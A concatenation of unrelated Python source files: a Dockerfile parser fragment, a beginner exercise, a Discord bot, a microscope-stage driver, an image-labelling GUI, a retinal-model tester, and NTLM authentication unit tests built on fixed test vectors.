for instruction in self.get_instructions(stage=stage):
if instruction.get_type() == instruction_type:
instructions.append(instruction)
return instructions
def get_first_instruction_of_type(self, instruction_type, stage=None):
for instruction in self.get_instructions(stage=stage):
if instruction.get_type() == instruction_type:
return instruction
return None
def get_maintainer_labels(self, ignore_case, stage=None):
instructions = list()
for instruction in self.get_instructions(stage=stage):
if instruction.get_type() == Keywords.LABEL and instruction.contains("maintainer", ignore_case):
instructions.append(instruction)
return instructions
def get_last_index_of(self, instruction_type, stage=None):
last_index = -1
for index, instruction in enumerate(self.instructions):
if stage is None or instruction.stage == stage:
if instruction.get_type() == instruction_type:
last_index = index
return last_index
def get_instruction_count(self, stage=None):
return len(self.get_instructions(stage=stage))
def contains_arg_with_name(self, name):
"""Returns true if arg is part of one of all instructions"""
return name in set(instruction.name for instruction in self.get_instructions_of_type(Keywords.ARG))
def __str__(self):
return self.path if self.path else Dockerfile.dockerfile + " without path"
|
"""
Escreva um programa que pergunte a quantidade de Km percorridos por um carro alugado
e a quantidade de dias pelos quais ele foi alugado. Calcule o preço a pagar,
sabendo que o carro custa R$ 60 por dia e R$ 0,15 por Km rodado.
"""
# entrada de dados
km_percorrido = float(input('Digite a quantidade de quilometros percorridos por um carro: '))
dias_alugado = int(input('O carro foi alugado por quantos dias? '))
# cálculo dos valores
total_km = km_percorrido * 0.15
total_dias = dias_alugado * 60
total_gasto = total_km + total_dias
print(f'Você gastou R$ {total_gasto:.2f} ao todo, sendo o total de R$ {total_km:.2f} pelos quilômetros e R$ {total_dias:.2f} por dias alugados.')
|
import os
import socket
from aiohttp import AsyncResolver, ClientSession, TCPConnector
from datetime import datetime
from discord.ext import commands
# All the cogs that are to be loaded on launch
cogs = ['bot.cogs.base',]
class DTSBot(commands.Bot):
def __init__(self):
super().__init__(command_prefix="!",
description='DTS Apprentice Made Bot!')
async def on_ready(self):
self.http_session = ClientSession(
connector=TCPConnector(resolver=AsyncResolver(), family=socket.AF_INET)
)
for cog in cogs:
try:
self.load_extension(cog)
except Exception as e:
logger.error(f'Failed to load extension: {cog}\n{e}')
print(f'Client Logged in at {datetime.now()}')
print(f'Logged in as : {self.user.name}')
print(f'ID : {self.user.id}')
def run(self):
super().run(os.environ.get('TOKEN'), reconnect=True)
if __name__ == '__main__':
bot = DTSBot()
bot.run()
|
# -*- coding: utf-8 -*-
import time
import numpy as np
from PyQt4 import QtGui, QtCore
from ..Stage import Stage, MoveFuture, StageInterface
from acq4.drivers.Scientifica import Scientifica as ScientificaDriver
from acq4.util.Mutex import Mutex
from acq4.util.Thread import Thread
from acq4.pyqtgraph import debug, ptime, SpinBox
class Scientifica(Stage):
"""
A Scientifica motorized device.
This class supports PatchStar, MicroStar, SliceScope, objective changers, etc.
The device may be identified either by its serial port or by its description
string:
port: <serial port> # eg. 'COM1' or '/dev/ttyACM0'
name: <string> # eg. 'SliceScope' or 'MicroStar 2'
baudrate: <int> # may be 9600 or 38400
The optional 'baudrate' parameter is used to set the baudrate of the device.
Both valid rates will be attempted when initially connecting.
"""
def __init__(self, man, config, name):
# can specify
port = config.pop('port', None)
name = config.pop('name', None)
self.scale = config.pop('scale', (1e-6, 1e-6, 1e-6))
baudrate = config.pop('baudrate', None)
ctrl_version = config.pop('version', 2)
try:
self.dev = ScientificaDriver(port=port, name=name, baudrate=baudrate, ctrl_version=ctrl_version)
except RuntimeError as err:
if hasattr(err, 'dev_version'):
raise RuntimeError(err.message + " You must add `version=%d` to the configuration for this device and double-check any speed/acceleration parameters." % int(err.dev_version))
else:
raise
# Controllers reset their baud to 9600 after power cycle
if baudrate is not None and self.dev.getBaudrate() != baudrate:
self.dev.setBaudrate(baudrate)
self._lastMove = None
man.sigAbortAll.connect(self.abort)
Stage.__init__(self, man, config, name)
# clear cached position for this device and re-read to generate an initial position update
self._lastPos = None
self.getPosition(refresh=True)
# Set approach angle
# Disabled--this toggles the approach bit and we can't reconfigure it from here :(
# approach = self.dev.send('APPROACH')
# self.dev.send('ANGLE %f' % self.pitch)
# self.dev.send('APPROACH %s' % approach) # reset approach bit; setting angle enables it
# set any extra parameters specified in the config
params = config.get('params', {})
for param, val in params.items():
if param == 'currents':
assert len(val) == 2
self.dev.setCurrents(*val)
elif param == 'axisScale':
assert len(val) == 3
for i, x in enumerate(val):
self.dev.setAxisScale(i, x)
else:
self.dev.setParam(param, val)
self.setUserSpeed(config.get('userSpeed', self.dev.getSpeed() * abs(self.scale[0])))
# whether to monitor for changes to a MOC
self.monitorObj = config.get('monitorObjective', False)
if self.monitorObj is True:
if self.dev._version < 3:
raise TypeError("Scientifica motion card version %s does not support reading objective position." % self.dev._version)
self.objectiveState = None
self._checkObjective()
# thread for polling position changes
self.monitor = MonitorThread(self, self.monitorObj)
self.monitor.start()
def capabilities(self):
"""Return a structure describing the capabilities of this device"""
if 'capabilities' in self.config:
return self.config['capabilities']
else:
return {
'getPos': (True, True, True),
'setPos': (True, True, True),
'limits': (False, False, False),
}
def stop(self):
"""Stop the manipulator immediately.
"""
with self.lock:
self.dev.stop()
if self._lastMove is not None:
self._lastMove._stopped()
self._lastMove = None
def abort(self):
"""Stop the manipulator immediately.
"""
self.dev.stop()
if self._lastMove is not None:
self._lastMove._stopped()
self._lastMove = None
def setUserSpeed(self, v):
"""Set the maximum speed of the stage (m/sec) when under manual control.
The stage's maximum speed is reset to this value when it is not under
programmed control.
"""
self.userSpeed = v
self.dev.setSpeed(v / abs(self.scale[0]))
def _getPosition(self):
# Called by superclass when user requests position refresh
with self.lock:
pos = self.dev.getPos()
pos = [pos[i] * self.scale[i] for i in (0, 1, 2)]
if pos != self._lastPos:
self._lastPos = pos
emit = True
else:
emit = False
if emit:
# don't emit signal while locked
self.posChanged(pos)
return pos
def targetPosition(self):
with self.lock:
if self._lastMove is None or self._lastMove.isDone():
return self.getPosition()
else:
return self._lastMove.targetPos
def quit(self):
self.monitor.stop()
Stage.quit(self)
def _move(self, abs, rel, speed, linear):
with self.lock:
if self._lastMove is not None and not self._lastMove.isDone():
self.stop()
pos = self._toAbsolutePosition(abs, rel)
speed = self._interpretSpeed(speed)
self._lastMove = ScientificaMoveFuture(self, pos, speed, self.userSpeed)
return self._lastMove
def deviceInterface(self, win):
return ScientificaGUI(self, win)
def startMoving(self, vel):
"""Begin moving the stage at a continuous velocity.
"""
s = [int(-v * 1000. / 67. / self.scale[i]) for i,v in enumerate(vel)]
print(s)
self.dev.send('VJ %d %d %d C' % tuple(s))
def _checkObjective(self):
with self.lock:
obj = int(self.dev.send('obj'))
if obj != self.objectiveState:
self.objectiveState = obj
self.sigSwitchChanged.emit(self, {'objective': obj})
def getSwitch(self, name):
if name == 'objective' and self.monitorObj:
return self.objectiveState
else:
return Stage.getSwitch(self, name)
class MonitorThread(Thread):
"""Thread to poll for manipulator position changes.
"""
def __init__(self, dev, monitorObj):
self.dev = dev
self.lock = Mutex(recursive=True)
self.monitorObj = monitorObj
self.stopped = False
self.interval = 0.3
Thread.__init__(self)
def start(self):
self.stopped = False
Thread.start(self)
def stop(self):
with self.lock:
self.stopped = True
def setInterval(self, i):
with self.lock:
self.interval = i
def run(self):
minInterval = 100e-3
interval = minInterval
lastPos = None
while True:
try:
with self.lock:
if self.stopped:
break
maxInterval = self.interval
pos = self.dev._getPosition() # this causes sigPositionChanged to be emitted
if pos != lastPos:
# if there was a change, then loop more rapidly for a short time.
interval = minInterval
lastPos = pos
else:
interval = min(maxInterval, interval*2)
if self.monitorObj is True:
self.dev._checkObjective()
time.sleep(interval)
except:
debug.printExc('Error in Scientifica monitor thread:')
time.sleep(maxInterval)
class ScientificaMoveFuture(MoveFuture):
"""Provides access to a move-in-progress on a Scientifica manipulator.
"""
def __init__(self, dev, pos, speed, userSpeed):
MoveFuture.__init__(self, dev, pos, speed)
self._interrupted = False
self._errorMSg = None
self._finished = False
pos = np.array(pos) / np.array(self.dev.scale)
with self.dev.dev.lock:
self.dev.dev.moveTo(pos, speed / abs(self.dev.scale[0]))
# reset to user speed immediately after starting move
# (the move itself will run with the previous speed)
self.dev.dev.setSpeed(userSpeed / abs(self.dev.scale[0]))
def wasInterrupted(self):
"""Return True if the move was interrupted before completing.
"""
return self._interrupted
def isDone(self):
"""Return True if the move is complete.
"""
return self._getStatus() != 0
def _getStatus(self):
# check status of move unless we already know it is complete.
# 0: still moving; 1: finished successfully; -1: finished unsuccessfully
if self._finished:
if self._interrupted:
return -1
else:
return 1
if self.dev.dev.isMoving():
# Still moving
return 0
# did we reach target?
pos = self.dev._getPosition()
dif = ((np.array(pos) - np.array(self.targetPos))**2).sum()**0.5
if dif < 2.5e-6:
# reached target
self._finished = True
return 1
else:
# missed
self._finished = True
self._interrupted = True
self._errorMsg = "Move did not complete (target=%s, position=%s, dif=%s)." % (self.targetPos, pos, dif)
return -1
def _stopped(self):
# Called when the manipulator is stopped, possibly interrupting this move.
status = self._getStatus()
if status == 1:
# finished; ignore stop
return
elif status == -1:
self._errorMsg = "Move was interrupted before completion."
elif status == 0:
# not actually stopped! This should not happen.
raise RuntimeError("Interrupted move but manipulator is still running!")
else:
raise Exception("Unknown status: %s" % status)
def errorMessage(self):
return self._errorMsg
class ScientificaGUI(StageInterface):
def __init__(self, dev, win):
StageInterface.__init__(self, dev, win)
# Insert Scientifica-specific controls into GUI
self.zeroBtn = QtGui.QPushButton('Zero position')
self.layout.addWidget(self.zeroBtn, self.nextRow, 0, 1, 2)
self.nextRow += 1
self.psGroup = QtGui.QGroupBox('Rotary Controller')
self.layout.addWidget(self.psGroup, self.nextRow, 0, 1, 2)
self.nextRow += 1
self.psLayout = QtGui.QGridLayout()
self.psGroup.setLayout(self.psLayout)
self.speedLabel = QtGui.QLabel('Speed')
self.speedSpin = SpinBox(value=self.dev.userSpeed, suffix='m/turn', siPrefix=True, dec=True, bounds=[1e-6, 10e-3])
self.psLayout.addWidget(self.speedLabel, 0, 0)
self.psLayout.addWidget(self.speedSpin, 0, 1)
self.zeroBtn.clicked.connect(self.dev.dev.zeroPosition)
self.speedSpin.valueChanged.connect(lambda v: self.dev.setDefaultSpeed(v))
|
# import gi
import os
import csv
# gi.require_version('Gtk', '3.0')
# from gi.repository import Gtk, Gdk
# from gi.repository import GdkPixbuf
import tkinter as tk
from tkinter import filedialog, StringVar
from PIL import Image, ImageTk
class SingleView(tk.Frame):
def __init__(self, master=None):
if not os.path.exists("labels.csv"):
with open("labels.csv", "w") as l:
writer = csv.DictWriter(l, ["filename", "label"])
writer.writeheader()
super().__init__(master)
self.pack()
self.img_dir = ""
self.root_dir = ""
self.entry_text = StringVar()
self.current_files = []
self.available_dirs = []
self.img_index = 0
self.folder_index = 0
self.progress = self.restore_from_file()
self.welcome_label = tk.Label(self,
text="Click Choose Directory and select the directory containing the images to be labeled")
self.img = tk.Label(self, image=None)
self.entry = tk.Entry(self, textvariable=self.entry_text)
self.entry.bind("<Return>", self.on_submit_entry)
self.select_folder_btn = tk.Button(self, command=self.on_folder_clicked, text="Select Folder")
prev_btn = tk.Button(self, command=self.prev_img, text="Previous Image")
submit = tk.Button(self, command=self.on_submit, text="Submit")
submit.bind("<Return>", self.on_submit)
self.grid(column=0, row=0, columnspan=3, rowspan=6)
self.welcome_label.grid(column=0, row=0, columnspan=3, rowspan=1)
self.img.grid(column=0, row=1, columnspan=3, rowspan=2)
self.entry.grid(column=0, row=4, columnspan=3, rowspan=1)
self.select_folder_btn.grid(column=0, row=5, columnspan=1, rowspan=1)
prev_btn.grid(column=1, row=5, columnspan=1, rowspan=1)
submit.grid(column=2, row=5, columnspan=1, rowspan=1)
def prev_img(self):
self.img_index -= 2
if self.img_index < 0:
self.img_index = 0
self.folder_index -= 2
if self.folder_index < 0:
self.folder_index = 0
return
self.move_to_next_folder()
self.update_img()
with open("labels.csv", "a+") as csv_file:
# Taken from https://stackoverflow.com/a/10289740
# Move the pointer (similar to a cursor in a text editor) to the end of the file.
csv_file.seek(0, os.SEEK_END)
# This code means the following code skips the very last character in the file -
# i.e. in the case the last line is null we delete the last line
# and the penultimate one
pos = csv_file.tell() - 1
# Read each character in the file one at a time from the penultimate
# character going backwards, searching for a newline character
# If we find a new line, exit the search
while pos > 0 and csv_file.read(1) != "\n":
pos -= 1
csv_file.seek(pos, os.SEEK_SET)
# So long as we're not at the start of the file, delete all the characters ahead of this position
if pos > 0:
# Skips the \n character
pos += 1
# Truncate the file after \n
csv_file.seek(pos, os.SEEK_SET)
csv_file.truncate()
@staticmethod
def restore_from_file():
done_dict = {}
with open("labels.csv", "r") as prog:
reader = csv.DictReader(prog)
for row in reader:
done_dict[row["filename"]] = True
folder = row["filename"]
folder = folder.split(os.path.sep)[:-1]
folder = os.path.sep.join(folder)
done_dict[folder] = True
return done_dict
def on_submit_entry(self, a):
self.on_submit()
def on_submit(self):
with open("labels.csv", "a+") as labels:
writer = csv.DictWriter(labels, ["filename", "label"])
try:
writer.writerow({"filename": self.current_files[self.img_index], "label": self.entry_text.get()})
self.entry_text.set("")
self.update_img()
except IndexError as e:
self.move_to_next_folder()
def update_img(self):
self.img_index += 1
path = self.current_files[self.img_index]
if path not in self.progress:
try:
tmp_img = ImageTk.PhotoImage(Image.open(path))
self.img.configure(image=tmp_img)
self.img.image = tmp_img
self.welcome_label["text"] = path
except Exception as e:
print(e)
else:
self.update_img()
def select_files(self, folder):
self.current_files = [os.path.join(folder, f) for f in os.listdir(folder) if
os.path.isfile(os.path.join(folder, f))]
def get_dirs(self, folder):
self.available_dirs = [os.path.join(folder, f) for f in os.listdir(folder) if
os.path.isdir(os.path.join(folder, f))]
def on_folder_clicked(self):
self.img_dir = filedialog.askdirectory()
if self.img_dir == "":
return
# Have to replace all of the "/" because tkinter only returns a path containing them
components = self.img_dir.split("/")
if os.path.sep == "\\":
components[0] += "\\"
else:
components[0] = "/"
self.img_dir = ""
for i in components:
self.img_dir = os.path.join(self.img_dir, i)
try:
self.get_dirs(self.img_dir)
self.select_files(self.img_dir)
self.update_img()
except IndexError as e:
self.move_to_next_folder()
def move_to_next_folder(self):
self.folder_index += 1
try:
self.img_dir = self.available_dirs[self.folder_index]
if self.img_dir not in self.progress:
self.select_files(self.img_dir)
self.img_index = 0
self.update_img()
else:
self.move_to_next_folder()
except IndexError:
self.welcome_label[
"text"] = "Click submit again, if there are no new images, you are done with the selected directory!"
if __name__ == '__main__':
root = tk.Tk()
window = SingleView(master=root)
window.mainloop()
|
"""
This code is taken from PyPi stream_service package
https://github.com/BR1py/stream_service
"""
from __future__ import absolute_import
from .helpers import *
from . import frame
from . import rpc
from . import buffer
|
"""
Conditionals 2.
We extend the language of conditionals from the previous
example by adding the keyword "else". This allows conditionals
to ask two or more sequential questions, each with a different
action.
"""
size(640, 360)
background(0)
for i in range(2, width - 2, 2):
# If 'i' divides by 20 with no remainder
if i % 20 == 0:
stroke(255)
line(i, 80, i, height / 2)
# If 'i' divides by 10 with no remainder
elif i % 10 == 0:
stroke(153)
line(i, 20, i, 180)
# If neither of the above two conditions are met
# then draw this line
else:
stroke(102)
line(i, height / 2, i, height - 20)
|
#!/usr/bin/env python
from distutils.core import setup
# setup options
setup(
name='core',
author='Zach Panzarino',
version='1.0.0',
platforms='ANY',
packages=['core'],
)
|
import os.path as osp
import numpy as np
from shutil import copyfile
from typing import Optional
import time
import json
import logging
import torch
from omegaconf import DictConfig, OmegaConf
from hydra.utils import instantiate
import torch.nn.functional as F
from terminaltables.ascii_table import AsciiTable
import wandb
import retinal.data.test_augment as ta
from retinal.modeling import CompoundLoss
from retinal.evaluation import MultiClassEvaluator, AverageMeter, LossMeter
from retinal.utils import round_dict, get_lr
from retinal.utils.checkpoint import load_checkpoint
logger = logging.getLogger(__name__)
class DRTester:
def __init__(self, cfg: DictConfig) -> None:
self.cfg = cfg
self.work_dir = self.cfg.work_dir
self.device = torch.device(self.cfg.device)
self.build_data_loader()
self.build_model(self.cfg.test.checkpoint)
self.build_meter()
self.init_wandb_or_not()
def init_wandb_or_not(self):
if self.cfg.wandb.enable:
wandb.init(
project=self.cfg.wandb.project,
entity=self.cfg.wandb.entity,
config=OmegaConf.to_container(self.cfg, resolve=True),
tags=self.cfg.wandb.tags.split(","),
)
wandb.run.name = "{}-test-{}-{}".format(
wandb.run.id, self.cfg.model.name, self.cfg.data.name
)
wandb.run.save()
wandb.watch(self.model, log=None)
logger.info("Wandb initialized : {}".format(wandb.run.name))
def build_data_loader(self) -> None:
# data pipeline
self.test_loader = instantiate(self.cfg.data.object.test_ta)
def build_model(self, checkpoint: Optional[str] = "") -> None:
self.model = instantiate(self.cfg.model.object)
self.model.to(self.device)
logger.info("Model initialized")
self.checkpoint_path = osp.join(
self.work_dir, "best.pth" if checkpoint == "" else checkpoint
)
load_checkpoint(self.checkpoint_path, self.model, self.device)
def build_meter(self):
if self.cfg.data.name != "folder":
self.num_classes = self.test_loader.num_classes
self.evaluator = MultiClassEvaluator(
num_classes=self.num_classes
)
self.batch_time_meter = AverageMeter()
logger.info("Meters initialized")
def reset_meter(self):
if self.cfg.data.name != "folder":
self.evaluator.reset()
self.batch_time_meter.reset()
def log_iter_info(self, iter, max_iter):
log_dict = {}
log_dict["batch_time"] = self.batch_time_meter.val
if self.cfg.data.name != "folder":
log_dict.update(self.evaluator.curr_score())
logger.info(
"Test iter[{}/{}]\t{}".format(
iter + 1, max_iter, json.dumps(round_dict(log_dict))
)
)
def log_epoch_info(self):
log_dict = {}
if self.cfg.data.name != "folder":
log_dict["samples"] = self.evaluator.num_samples()
metric, table_data = self.evaluator.mean_score(print=False)
log_dict.update(metric)
logger.info("\n" + AsciiTable(table_data).table)
logger.info("Test Epoch\t{}".format(
json.dumps(round_dict(log_dict))
))
if self.cfg.wandb.enable:
wandb_log_dict = dict(
("Test/{}".format(key), value) for (key, value) in log_dict.items()
)
wandb_log_dict["Test/score_table"] = wandb.Table(
columns=table_data[0], data=table_data[1:]
)
wandb_log_dict["Test/conf_mat"] = wandb.sklearn.plot_confusion_matrix(
self.evaluator.labels,
self.evaluator.pred_labels,
self.evaluator.classes,
)
wandb.log(wandb_log_dict)
@torch.no_grad()
def test(self):
self.reset_meter()
self.model.eval()
max_iter = len(self.test_loader)
end = time.time()
if self.cfg.test.save_prediction:
fsave = open(osp.join(self.work_dir, "predicts.csv"), "w")
for i, samples in enumerate(self.test_loader):
# import ipdb; ipdb.set_trace()
# img = ta.preprocess(samples[0])
img = samples[0]
inputs = ta.augment(
img,
self.cfg.test.augment
)
if isinstance(inputs, list):
outputs = [
self.model(torch.from_numpy(x).to(self.device)) for x in inputs
]
outputs = torch.cat(outputs, dim=0)
else:
inputs = torch.from_numpy(inputs).to(self.device)
outputs = self.model(inputs)
label = samples[1]
predicts = F.softmax(outputs, dim=1)
predicts = ta.fuse_predicts(predicts, reduce=self.cfg.test.augment.fuse)
pred_label = torch.argmax(predicts)
if self.cfg.data.name != "folder":
self.evaluator.update(
np.expand_dims(predicts.detach().cpu().numpy(), axis=0),
np.expand_dims(label, axis=0),
)
if self.cfg.test.save_prediction:
fsave.write("{},{},{:.5f},{:.5f},{:.5f},{:.5f},{:.5f},{:.5f}\n".format(
osp.splitext(samples[2])[0],
pred_label,
predicts.max(),
predicts[0], predicts[1], predicts[2], predicts[3], predicts[4],
))
# measure elapsed time
self.batch_time_meter.update(time.time() - end)
# logging
if (i + 1) % self.cfg.log_period == 0:
self.log_iter_info(i, max_iter)
end = time.time()
self.log_epoch_info()
if self.cfg.test.save_prediction:
fsave.close()
|
import struct
import time
from ntlm_auth.compute_response import ComputeResponse, get_windows_timestamp
from ntlm_auth.constants import AvId, AvFlags
from ntlm_auth.messages import ChallengeMessage, TargetInfo
class TestGeneric(object):
def test_get_timestamp_format(self):
actual1 = struct.unpack("<q", get_windows_timestamp())[0]
time.sleep(1)
actual2 = struct.unpack("<q", get_windows_timestamp())[0]
assert actual2 > actual1
class TestHashResults(object):
def test_get_LMv1_response(self):
# 4.2.2.2.2 - LMv1 Response
server_challenge = b"\x01\x23\x45\x67\x89\xab\xcd\xef"
expected = b"\x98\xde\xf7\xb8\x7f\x88\xaa\x5d" \
b"\xaf\xe2\xdf\x77\x96\x88\xa1\x72" \
b"\xde\xf1\x1c\x7d\x5c\xcd\xef\x13"
actual = ComputeResponse._get_LMv1_response("Password",
server_challenge)
assert actual == expected
def test_get_LMv2_response(self):
# 4.2.4.2.1 - LMv2 Response
server_challenge = b"\x01\x23\x45\x67\x89\xab\xcd\xef"
client_challenge = b"\xaa" * 8
expected = b"\x86\xc3\x50\x97\xac\x9c\xec\x10" \
b"\x25\x54\x76\x4a\x57\xcc\xcc\x19" \
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
actual = ComputeResponse._get_LMv2_response("User", "Password",
"Domain", server_challenge,
client_challenge)
assert actual == expected
def test_get_NTLMv1_response(self):
# 4.2.2.2.1 - NTLMv1 Response
server_challenge = b"\x01\x23\x45\x67\x89\xab\xcd\xef"
expected_response = b"\x67\xc4\x30\x11\xf3\x02\x98\xa2" \
b"\xad\x35\xec\xe6\x4f\x16\x33\x1c" \
b"\x44\xbd\xbe\xd9\x27\x84\x1f\x94"
expected_key = b"\xd8\x72\x62\xb0\xcd\xe4\xb1\xcb" \
b"\x74\x99\xbe\xcc\xcd\xf1\x07\x84"
actual_response, actual_key = \
ComputeResponse._get_NTLMv1_response("Password", server_challenge)
assert actual_response == expected_response
assert actual_key == expected_key
def test_get_NTLM2_response(self):
# 4.2.3.2.2 - NTLMv1 Response
server_challenge = b"\x01\x23\x45\x67\x89\xab\xcd\xef"
client_challenge = b"\xaa" * 8
expected_response = b"\x75\x37\xf8\x03\xae\x36\x71\x28" \
b"\xca\x45\x82\x04\xbd\xe7\xca\xf8" \
b"\x1e\x97\xed\x26\x83\x26\x72\x32"
expected_key = b"\xd8\x72\x62\xb0\xcd\xe4\xb1\xcb" \
b"\x74\x99\xbe\xcc\xcd\xf1\x07\x84"
actual_response, actual_key = \
ComputeResponse._get_NTLM2_response("Password", server_challenge,
client_challenge)
assert actual_response == expected_response
assert actual_key == expected_key
def test_nt_v2_temp_response(self):
# 4.2.4.1.3 - temp
test_target_info = TargetInfo()
test_target_info[AvId.MSV_AV_NB_DOMAIN_NAME] = \
b"\x44\x00\x6f\x00\x6d\x00\x61\x00\x69\x00\x6e\x00"
test_target_info[AvId.MSV_AV_NB_COMPUTER_NAME] = \
b"\x53\x00\x65\x00\x72\x00\x76\x00\x65\x00\x72\x00"
expected = b"\x01\x01\x00\x00\x00\x00\x00\x00" \
b"\x00\x00\x00\x00\x00\x00\x00\x00" \
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa" \
b"\x00\x00\x00\x00\x02\x00\x0c\x00" \
b"\x44\x00\x6f\x00\x6d\x00\x61\x00" \
b"\x69\x00\x6e\x00\x01\x00\x0c\x00" \
b"\x53\x00\x65\x00\x72\x00\x76\x00" \
b"\x65\x00\x72\x00\x00\x00\x00\x00" \
b"\x00\x00\x00\x00"
actual = ComputeResponse._get_NTLMv2_temp(b"\x00" * 8, b"\xaa" * 8,
test_target_info)
assert actual == expected
def test_get_NTLMv2_response(self):
# 4.2.4.2.2 - NTLMv2 Response
server_challenge = b"\x01\x23\x45\x67\x89\xab\xcd\xef"
client_challenge = b"\xaa" * 8
test_target_info = TargetInfo()
test_target_info[AvId.MSV_AV_NB_DOMAIN_NAME] = \
b"\x44\x00\x6f\x00\x6d\x00\x61\x00\x69\x00\x6e\x00"
test_target_info[AvId.MSV_AV_NB_COMPUTER_NAME] = \
b"\x53\x00\x65\x00\x72\x00\x76\x00\x65\x00\x72\x00"
expected_response = b"\x68\xcd\x0a\xb8\x51\xe5\x1c\x96" \
b"\xaa\xbc\x92\x7b\xeb\xef\x6a\x1c" \
b"\x01\x01\x00\x00\x00\x00\x00\x00" \
b"\x00\x00\x00\x00\x00\x00\x00\x00" \
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa" \
b"\x00\x00\x00\x00\x02\x00\x0c\x00" \
b"\x44\x00\x6f\x00\x6d\x00\x61\x00" \
b"\x69\x00\x6e\x00\x01\x00\x0c\x00" \
b"\x53\x00\x65\x00\x72\x00\x76\x00" \
b"\x65\x00\x72\x00\x00\x00\x00\x00" \
b"\x00\x00\x00\x00"
expected_key = b"\x8d\xe4\x0c\xca\xdb\xc1\x4a\x82" \
b"\xf1\x5c\xb0\xad\x0d\xe9\x5c\xa3"
actual_response, actual_key = \
ComputeResponse._get_NTLMv2_response("User", "Password", "Domain",
server_challenge,
client_challenge, b"\x00" * 8,
test_target_info)
assert actual_response == expected_response
assert actual_key == expected_key
class TestChallengeResults(object):
def test_lm_v1_response(self):
test_challenge_message = ChallengeMessage(
b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
b"\x02\x00\x00\x00\x0c\x00\x0c\x00"
b"\x38\x00\x00\x00\x33\x82\x02\xe2"
b"\x01\x23\x45\x67\x89\xab\xcd\xef"
b"\x06\x00\x70\x17\x00\x00\x00\x0f"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00"
)
expected = b"\x98\xde\xf7\xb8\x7f\x88\xaa\x5d" \
b"\xaf\xe2\xdf\x77\x96\x88\xa1\x72" \
b"\xde\xf1\x1c\x7d\x5c\xcd\xef\x13"
actual = ComputeResponse("User", "Password", "Domain",
test_challenge_message,
1).get_lm_challenge_response()
assert actual == expected
def test_lm_v1_with_extended_security_response(self, monkeypatch):
monkeypatch.setattr('os.urandom', lambda s: b"\xaa" * 8)
test_challenge_message = ChallengeMessage(
b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
b"\x02\x00\x00\x00\x0c\x00\x0c\x00"
b"\x38\x00\x00\x00\x33\x82\x0a\x82"
b"\x01\x23\x45\x67\x89\xab\xcd\xef"
b"\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x06\x00\x70\x17\x00\x00\x00\x0f"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00"
)
expected = b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa" \
b"\x00\x00\x00\x00\x00\x00\x00\x00" \
b"\x00\x00\x00\x00\x00\x00\x00\x00"
actual = ComputeResponse("User", "Password", "Domain",
test_challenge_message,
1).get_lm_challenge_response()
assert actual == expected
def test_lm_v1_with_ntlm_2_response(self):
test_challenge_message = ChallengeMessage(
b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
b"\x02\x00\x00\x00\x0c\x00\x0c\x00"
b"\x38\x00\x00\x00\x33\x82\x02\xe2"
b"\x01\x23\x45\x67\x89\xab\xcd\xef"
b"\x06\x00\x70\x17\x00\x00\x00\x0f"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00"
)
# Not explicitly in the example shown but it does expect the same
# response that we already have set
expected = b"\x67\xc4\x30\x11\xf3\x02\x98\xa2" \
b"\xad\x35\xec\xe6\x4f\x16\x33\x1c" \
b"\x44\xbd\xbe\xd9\x27\x84\x1f\x94"
actual = ComputeResponse("User", "Password", "Domain",
test_challenge_message,
2).get_lm_challenge_response()
assert actual == expected
def test_lm_v2_response(self, monkeypatch):
monkeypatch.setattr('os.urandom', lambda s: b"\xaa" * 8)
test_challenge_message = ChallengeMessage(
b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
b"\x02\x00\x00\x00\x03\x00\x0c\x00"
b"\x38\x00\x00\x00\x33\x82\x8a\xe2"
b"\x01\x23\x45\x67\x89\xab\xcd\xef"
b"\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x24\x00\x24\x00\x44\x00\x00\x00"
b"\x06\x00\x70\x17\x00\x00\x00\x0f"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00\x02\x00\x0c\x00"
b"\x44\x00\x6f\x00\x6d\x00\x61\x00"
b"\x69\x00\x6e\x00\x01\x00\x0c\x00"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00\x00\x00\x00\x00"
)
expected = b"\x86\xc3\x50\x97\xac\x9c\xec\x10" \
b"\x25\x54\x76\x4a\x57\xcc\xcc\x19" \
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
actual = ComputeResponse("User", "Password", "Domain",
test_challenge_message,
3).get_lm_challenge_response()
assert actual == expected
def test_lm_v2_response_with_no_target_info_timestamp(self, monkeypatch):
monkeypatch.setattr('os.urandom', lambda s: b"\xaa" * 8)
test_target_info = TargetInfo()
test_target_info[AvId.MSV_AV_NB_DOMAIN_NAME] = \
b"\x44\x00\x6f\x00\x6d\x00\x61\x00\x69\x00\x6e\x00"
test_target_info[AvId.MSV_AV_NB_COMPUTER_NAME] = \
b"\x53\x00\x65\x00\x72\x00\x76\x00\x65\x00\x72\x00"
test_challenge_message = ChallengeMessage(
b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
b"\x02\x00\x00\x00\x03\x00\x0c\x00"
b"\x38\x00\x00\x00\x33\x82\x8a\xe2"
b"\x01\x23\x45\x67\x89\xab\xcd\xef"
b"\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x24\x00\x24\x00\x44\x00\x00\x00"
b"\x06\x00\x70\x17\x00\x00\x00\x0f"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00\x02\x00\x0c\x00"
b"\x44\x00\x6f\x00\x6d\x00\x61\x00"
b"\x69\x00\x6e\x00\x01\x00\x0c\x00"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00\x00\x00\x00\x00"
)
test_challenge_message.target_info = test_target_info
expected = b"\x86\xc3\x50\x97\xac\x9c\xec\x10" \
